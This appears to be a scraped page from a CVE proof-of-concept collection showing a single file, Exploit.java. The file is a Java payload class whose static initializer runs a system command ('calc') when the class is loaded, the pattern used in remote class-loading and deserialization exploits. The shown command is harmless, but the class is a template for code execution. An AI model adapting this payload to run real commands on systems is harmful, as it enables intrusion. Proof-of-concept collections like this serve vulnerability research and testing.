4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / Exploit.java JAVA
import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}